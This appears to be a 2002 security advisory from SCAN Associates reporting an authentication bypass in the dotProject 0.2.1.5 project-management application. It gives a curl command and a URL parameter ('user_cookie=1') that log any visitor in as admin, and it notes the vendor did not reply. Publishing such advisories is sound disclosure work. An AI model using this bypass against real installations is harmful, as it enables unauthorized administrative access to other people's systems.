Related information

CGI bugs

code injection in gallery

Code injection Vulnerability in endity.com's shoutBOX

Directory traversal vulnerability in sendform.cgi

Bug in Eupload

From:	pokleyzz <pokleyzz_(at)_scan-associates.net>
Date:	31.07.2002
Subject:	php dotProject by pass authentication

SCAN Associates Sdn Bhd Security Advisory

Product: dotProject 0.2.1.5 (possibly other)

Vendor URL: http://www.dotmarketing.org/dotproject/

Summary: php dotProject by pass authentication

Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>

Description
===========
dotProject is web base project management system .
This application consider as beta version.

Details
=======
Everyone can bypass authentication and login as Admin.  
It was rather simple to exploit, user may send a crafted cookie like:

curl -b user_cookie=1 http://server/project/index.php?m=projects

Or simply append user_cookie=1 in any URL:

http://server/project/index.php?m=projects&user_cookie=1

Vendor Response
===============
Vendor has been contacted on 24/7/2002 but no reply.

www.scan-associates.net <http://www.scan-associates.net>